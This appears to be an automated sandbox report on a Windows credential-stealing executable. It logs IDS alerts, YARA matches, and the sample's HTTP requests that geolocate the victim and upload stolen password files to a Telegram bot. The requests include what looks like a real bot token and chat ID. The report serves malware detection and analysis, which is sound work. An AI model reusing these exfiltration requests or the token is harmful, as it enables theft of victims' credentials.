                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50158 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50159 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50161 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50162 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50163 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50164 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50165 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50167 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50169 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50171 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50173 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50175 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50177 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50179 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50181 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50183 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50185 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50187 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50189 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50191 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50193 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50195 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50197 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50199 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50201 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50203 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50205 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50207 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50209 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50211 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50213 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50215 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50217 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50219 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50221 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50223 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50225 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50227 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50229 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50231 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50233 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50235 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50237 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.7:50239 version: TLS 1.2
                    Source: Yef4EqsQha.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: UIQk.pdbSHA256 source: Yef4EqsQha.exe
                    Source: Binary string: UIQk.pdb source: Yef4EqsQha.exe
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 077F84BAh0_2_077F7B83
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 077F84BAh0_2_077F7D2C
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 00DFF475h6_2_00DFF2D8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 00DFF475h6_2_00DFF4C4
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 00DFF475h6_2_00DFF545
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 00DFFC31h6_2_00DFF98C
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A7EB5h6_2_054A7B78
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A9280h6_2_054A8FB0
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A0FF1h6_2_054A0D48
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054AE816h6_2_054AE548
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054AC826h6_2_054AC558
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054AECA6h6_2_054AE9D8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054ACCB6h6_2_054AC9E8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A18A1h6_2_054A15F8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A1449h6_2_054A11A0
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A02E9h6_2_054A0040
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A3709h6_2_054A3460
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A32B1h6_2_054A3008
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054ADEF6h6_2_054ADC28
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054ABF06h6_2_054ABC38
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A62D9h6_2_054A6030
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054AC396h6_2_054AC0C8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A0B99h6_2_054A08F0
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A6733h6_2_054A6488
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then mov esp, ebp6_2_054AB081
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A0741h6_2_054A0498
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then mov esp, ebp6_2_054AB090
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054AE386h6_2_054AE0B8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A2A01h6_2_054A2758
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054AD5D6h6_2_054AD308
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A25A9h6_2_054A2300
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054AB5E6h6_2_054AB318
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A55D1h6_2_054A5328
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A79C9h6_2_054A7720
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A5E81h6_2_054A5BD8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054AFA56h6_2_054AF788
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A5A29h6_2_054A5780
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054ADA66h6_2_054AD798
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054ABA76h6_2_054AB7A8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A2E59h6_2_054A2BB0
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A1CF9h6_2_054A1A50
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054AF136h6_2_054AEE68
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A4D21h6_2_054A4A78
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054AD146h6_2_054ACE78
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A7119h6_2_054A6E70
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A6CC1h6_2_054A6A18
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A48C9h6_2_054A4620
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A7571h6_2_054A72C8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A5179h6_2_054A4ED0
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054AF5C6h6_2_054AF2F8
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 4x nop then jmp 054A2151h6_2_054A1EA8

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49884 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50009 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49999 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50017 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.7:49834 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50022 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50030 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50016 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50008 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50004 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50035 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50006 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50010 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50023 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50012 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50000 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50026 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50033 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50031 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50025 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50014 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49996 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50020 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50029 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50011 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50013 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50028 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49998 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50027 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50024 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50019 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50034 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49997 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50001 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:49995 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50007 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50015 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50032 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50002 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50018 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50021 -> 149.154.167.220:443
                    Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.7:50005 -> 149.154.167.220:443
                    Uses the Telegram API (likely for C&C communication)
                    Source: unknownDNS query: name: api.telegram.org
                    Source: unknownDNS query: name: api.telegram.org
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 6.2.Yef4EqsQha.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Yef4EqsQha.exe.3d10f28.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Yef4EqsQha.exe.3cce508.2.raw.unpack, type: UNPACKEDPE
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
                    Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:216554%0D%0ADate%20and%20Time:%2011/01/2025%20/%2005:41:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20216554%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd32713826b139Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3386f64b78bdHost: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd339547c57964Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd33a4dfa3e873Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd33b470d7c755Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd33c3fb5a06a6Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd33d37f258c37Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3420b602a22eHost: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3433ee6a7188Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3445d7475f3bHost: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd345a462c9585Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3473c556f1ebHost: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd34dd1c714d92Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd34fa2af9aca0Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd351d7aa4bd0fHost: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd354481d11c88Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd35652fc0d40eHost: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd35fa1b258218Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3635e1258cc8Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3681b72dd0b8Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd36a5d1642b7dHost: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd36f2934ae498Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd3744214678b7Host: api.telegram.orgContent-Length: 585
                    Source: global trafficHTTP traffic detected: POST /bot7238847064:AAGocEE5wf6xU07DB5NC_n2nfh76_dkS10A/sendDocument?chat_id=-4517865277&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd39fc539c7760Host: api.telegram.orgContent-Length: 585
